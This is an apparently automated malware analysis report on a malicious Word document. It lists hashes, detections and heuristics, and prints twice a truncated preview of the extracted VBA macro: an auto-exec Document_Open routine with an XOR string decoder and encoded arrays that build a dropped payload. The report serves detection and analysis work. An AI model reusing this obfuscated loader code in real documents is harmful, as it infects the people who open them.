Office (OLE) malware analysis — malicious · 7ff46024fd031c52

MALICIOUS

Office (OLE)

409.0 KB Created: 2018-02-16 20:30:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: cfd6641eaf5cb52564ba21b09c2bc9dd SHA-1: 489c87293a2742a3b76787506157106029a2ecd7 SHA-256: 7ff46024fd031c52509cc60a1b30f734707c21fce94eaed4e8f056dc6284ba83

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a heavily obfuscated VBA macro within the Document_Open subroutine. This macro utilizes CreateObject and likely decodes and executes a payload, as indicated by the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics. The ClamAV detection 'Doc.Dropper.HexEncodedEXEHeader' further supports the payload dropping behavior. The embedded URL is benign and likely a false positive.

Heuristics 7

ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 96980 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	96980 bytes
SHA-256: `294ffc6fe0341cc6070a8a6bb6d5994b3c9b447acb330e971c66e94ab9b99cf4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If ActiveDocument.Variables("wKBiop").Value <> "toto" Then mlXVqVrOPcqAFza ActiveDocument.Variables("wKBiop").Value = "toto" If ActiveDocument.ReadOnly = False Then ActiveDocument.Save End If End If End Sub Attribute VB_Name = "avNKjNE" Private Function gWPCoDbMXk(QSuWileXSF As Variant, QUrVTlEkSs As Integer) Dim PzdiTNcqVI, xfUtzFhyNf As String, dFNWHXQhiR, GRMiznsleu xfUtzFhyNf = ActiveDocument.Variables("wKBiop").Value() PzdiTNcqVI = "" dFNWHXQhiR = 1 While dFNWHXQhiR < UBound(QSuWileXSF) + 2 GRMiznsleu = dFNWHXQhiR Mod Len(xfUtzFhyNf): If GRMiznsleu = 0 Then GRMiznsleu = Len(xfUtzFhyNf) PzdiTNcqVI = PzdiTNcqVI + Chr(Asc(Mid(xfUtzFhyNf, GRMiznsleu + QUrVTlEkSs, 1)) Xor CInt(QSuWileXSF(dFNWHXQhiR - 1))) dFNWHXQhiR = dFNWHXQhiR + 1 Wend gWPCoDbMXk = PzdiTNcqVI End Function Private Function decodeHex(hex) On Error Resume Next Dim DM, EL Set DM = CreateObject(gWPCoDbMXk(Array(3, 57, 55, 65, 26, 1, 11, 16, 34, 71, 33, 24, 34, 30, 40, 12), 15901)) Set EL = DM.createElement(gWPCoDbMXk(Array(69, 43, 58), 6246)) EL.DataType = gWPCoDbMXk(Array(0, 6, 63, 77, 17, 85, 73), 14094) EL.Text = hex decodeHex = EL.NodeTypedValue End Function Sub mlXVqVrOPcqAFza() Dim binary As String binary = gWPCoDbMXk(Array(7, 29, 33, 34, 46, 58, 114, 1, 102, 15, 76, 43), 7149) Dim code As String code = "" code = code & gWPCoDbMXk(Array(120, 36, 13, 45, 7, 3, 115, 22, 109, 59, 33, 30, 1, 51, 37, 50, 57, 104, 51, 15, 61, _ 6, 13, 58, 7, 9, 30, 36, 56, 87, 12, 0, 33, 82, 22, 8, 51, 36, 35, 123, 14, _ 49, 6, 60, 10, 15, 4, 83, 117, 19, 38, 16, 54, 39, 75, 22, 11, 34, 32, 44, 12, _ 13, 2, 107, 33, 107, 8, 103, 57, 73, 12, 12, 49, 2, 40, 6, 53, 7, 45, 1, 5, _ 6, 5, 39, 37, 53, 38, 28, 24, 74, 13, 43, 12, 85, 12, 6, 119, 45, 17, 57), 456) code = code & gWPCoDbMXk(Array(102, 32, 89, 24, 13, 62, 4, 53, 93, 89, 29, 124, 55, 5, 19, 58, 58, 84, 65, 25, 40, _ 91, 13, 13, 91, 7, 27, 3, 49, 82, 123, 2, 13, 93, 125, 37, 60, 92, 56, 56, 91, _ 112, 20, 47, 50, 54, 38, 5, 44, 51, 29, 43, 0, 67, 84, 6, 35, 1, 30, 33, 18, _ 40, 59, 22, 123, 24, 30, 125, 46, 49, 11, 7, 50, 107, 18, 52, 38, 89, 112, 107, 78, _ 5, 50, 95, 30, 35, 54, 58, 102, 99, 40, 9, 37, 112, 80, 57, 2, 13, 114, 6), 13494) code = code & gWPCoDbMXk(Array(82, 67, 6, 28, 88, 46, 21, 3, 36, 112, 26, 44, 14, 105, 101, 19, 0, 119, 56, 10, 6, _ 45, 13, 40, 22, 99, 80, 104, 20, 84, 60, 51, 23, 62, 42, 20, 61, 10, 17, 30, 99, _ 92, 59, 38, 117, 15, 24, 41, 32, 56, 5, 3, 99, 4, 16, 69, 9, 75, 20, 8, 44, _ 42, 39, 38, 59, 52, 48, 36, 23, 115, 58, 29, 1, 60, 96, 119, 29, 88, 46, 24, 64, _ 15, 58, 48, 40, 11, 17, 45, 27, 44, 39, 54, 56, 23, 11, 0, 37, 48, 4, 107), 17317) code = code & gWPCoDbMXk(Array(18, 10, 47, 61, 52, 56, 26, 9, 97, 87, 39, 25, 36, 28, 64, 37, 3, 42, 18, 50, 17, _ 83, 43, 90, 14, 60, 20, 47, 16, 13, 8, 61, 52, 9, 97, 101, 45, 15, 126, 111, 27, _ 36, 12, 43, 38, 11, 6, 121, 125, 36, 90, 17, 31, 7, 12, 27, 35, 69, 81, 109, 98, _ 85, 82, 55, 23, 37, 45, 70, 107, 77, 19, 50, 69, 18, 125, 35, 47, 2, 54, 18, 119, _ 9, 44, 25, 25, 1, 42, 118, 1, 57, 10, 94, 97, 14, 92, 32, 33, 41, 34, 14), 4746) code = code & gWPCoDbMXk(Array(8, 22, 31, 101, 92, 83, 62, 11, 36, 28, 30, 19, 117, 17, 67, 98, 120, 84, 11, 14, 47, _ 38, 34, 54, 55, 52, 17, 61, 30, 73, 42, 44, 23, 105, 97, 38, 19, 38, 41, 69, 40, _ 8, 7, 116, 21, 67, 17, 30, 31, 115, 22, 60, 41, 94, 78, 104, 75, 67, 24, 105, 97, _ 108, 7, 48, 21, 43, 43, 50, 18, 60, 42, 15, 18, 10, 80, 19, 110, 73, 96, 110, 35, _ 117, 12, 26, 0, 102, 63, 115, 19, 47, 122, 91, 30, 123, 14, 29, 59, 20, 67, 28), 3346) code = code & gWPCoDbMXk(Array(17, 101, 100, 20, 47, 19, 29, 2, 8, 2, 90, 63, 120, 63, 25, 86, 65, 115, 84, 111, 60, _ 24, 5, 21, 26, 76, 27, 116, 49, 17, 40, 26, 48, 33, 14, 2, 40, 39, 106, 12 ... (truncated)

SHA-256: 294ffc6fe0341cc6070a8a6bb6d5994b3c9b447acb330e971c66e94ab9b99cf4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("wKBiop").Value <> "toto" Then
mlXVqVrOPcqAFza
ActiveDocument.Variables("wKBiop").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "avNKjNE"
Private Function gWPCoDbMXk(QSuWileXSF As Variant, QUrVTlEkSs As Integer)
Dim PzdiTNcqVI, xfUtzFhyNf As String, dFNWHXQhiR, GRMiznsleu
xfUtzFhyNf = ActiveDocument.Variables("wKBiop").Value()
PzdiTNcqVI = ""
dFNWHXQhiR = 1
While dFNWHXQhiR < UBound(QSuWileXSF) + 2
GRMiznsleu = dFNWHXQhiR Mod Len(xfUtzFhyNf): If GRMiznsleu = 0 Then GRMiznsleu = Len(xfUtzFhyNf)
PzdiTNcqVI = PzdiTNcqVI + Chr(Asc(Mid(xfUtzFhyNf, GRMiznsleu + QUrVTlEkSs, 1)) Xor CInt(QSuWileXSF(dFNWHXQhiR - 1)))
dFNWHXQhiR = dFNWHXQhiR + 1
Wend
gWPCoDbMXk = PzdiTNcqVI
End Function
Private Function decodeHex(hex)
On Error Resume Next
Dim DM, EL
Set DM = CreateObject(gWPCoDbMXk(Array(3, 57, 55, 65, 26, 1, 11, 16, 34, 71, 33, 24, 34, 30, 40, 12), 15901))
Set EL = DM.createElement(gWPCoDbMXk(Array(69, 43, 58), 6246))
EL.DataType = gWPCoDbMXk(Array(0, 6, 63, 77, 17, 85, 73), 14094)
EL.Text = hex
decodeHex = EL.NodeTypedValue
End Function
Sub mlXVqVrOPcqAFza()
Dim binary As String
binary = gWPCoDbMXk(Array(7, 29, 33, 34, 46, 58, 114, 1, 102, 15, 76, 43), 7149)
Dim code As String
code = ""
code = code & gWPCoDbMXk(Array(120, 36, 13, 45, 7, 3, 115, 22, 109, 59, 33, 30, 1, 51, 37, 50, 57, 104, 51, 15, 61, _
6, 13, 58, 7, 9, 30, 36, 56, 87, 12, 0, 33, 82, 22, 8, 51, 36, 35, 123, 14, _
49, 6, 60, 10, 15, 4, 83, 117, 19, 38, 16, 54, 39, 75, 22, 11, 34, 32, 44, 12, _
13, 2, 107, 33, 107, 8, 103, 57, 73, 12, 12, 49, 2, 40, 6, 53, 7, 45, 1, 5, _
6, 5, 39, 37, 53, 38, 28, 24, 74, 13, 43, 12, 85, 12, 6, 119, 45, 17, 57), 456)
code = code & gWPCoDbMXk(Array(102, 32, 89, 24, 13, 62, 4, 53, 93, 89, 29, 124, 55, 5, 19, 58, 58, 84, 65, 25, 40, _
91, 13, 13, 91, 7, 27, 3, 49, 82, 123, 2, 13, 93, 125, 37, 60, 92, 56, 56, 91, _
112, 20, 47, 50, 54, 38, 5, 44, 51, 29, 43, 0, 67, 84, 6, 35, 1, 30, 33, 18, _
40, 59, 22, 123, 24, 30, 125, 46, 49, 11, 7, 50, 107, 18, 52, 38, 89, 112, 107, 78, _
5, 50, 95, 30, 35, 54, 58, 102, 99, 40, 9, 37, 112, 80, 57, 2, 13, 114, 6), 13494)
code = code & gWPCoDbMXk(Array(82, 67, 6, 28, 88, 46, 21, 3, 36, 112, 26, 44, 14, 105, 101, 19, 0, 119, 56, 10, 6, _
45, 13, 40, 22, 99, 80, 104, 20, 84, 60, 51, 23, 62, 42, 20, 61, 10, 17, 30, 99, _
92, 59, 38, 117, 15, 24, 41, 32, 56, 5, 3, 99, 4, 16, 69, 9, 75, 20, 8, 44, _
42, 39, 38, 59, 52, 48, 36, 23, 115, 58, 29, 1, 60, 96, 119, 29, 88, 46, 24, 64, _
15, 58, 48, 40, 11, 17, 45, 27, 44, 39, 54, 56, 23, 11, 0, 37, 48, 4, 107), 17317)
code = code & gWPCoDbMXk(Array(18, 10, 47, 61, 52, 56, 26, 9, 97, 87, 39, 25, 36, 28, 64, 37, 3, 42, 18, 50, 17, _
83, 43, 90, 14, 60, 20, 47, 16, 13, 8, 61, 52, 9, 97, 101, 45, 15, 126, 111, 27, _
36, 12, 43, 38, 11, 6, 121, 125, 36, 90, 17, 31, 7, 12, 27, 35, 69, 81, 109, 98, _
85, 82, 55, 23, 37, 45, 70, 107, 77, 19, 50, 69, 18, 125, 35, 47, 2, 54, 18, 119, _
9, 44, 25, 25, 1, 42, 118, 1, 57, 10, 94, 97, 14, 92, 32, 33, 41, 34, 14), 4746)
code = code & gWPCoDbMXk(Array(8, 22, 31, 101, 92, 83, 62, 11, 36, 28, 30, 19, 117, 17, 67, 98, 120, 84, 11, 14, 47, _
38, 34, 54, 55, 52, 17, 61, 30, 73, 42, 44, 23, 105, 97, 38, 19, 38, 41, 69, 40, _
8, 7, 116, 21, 67, 17, 30, 31, 115, 22, 60, 41, 94, 78, 104, 75, 67, 24, 105, 97, _
108, 7, 48, 21, 43, 43, 50, 18, 60, 42, 15, 18, 10, 80, 19, 110, 73, 96, 110, 35, _
117, 12, 26, 0, 102, 63, 115, 19, 47, 122, 91, 30, 123, 14, 29, 59, 20, 67, 28), 3346)
code = code & gWPCoDbMXk(Array(17, 101, 100, 20, 47, 19, 29, 2, 8, 2, 90, 63, 120, 63, 25, 86, 65, 115, 84, 111, 60, _
24, 5, 21, 26, 76, 27, 116, 49, 17, 40, 26, 48, 33, 14, 2, 40, 39, 106, 12
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.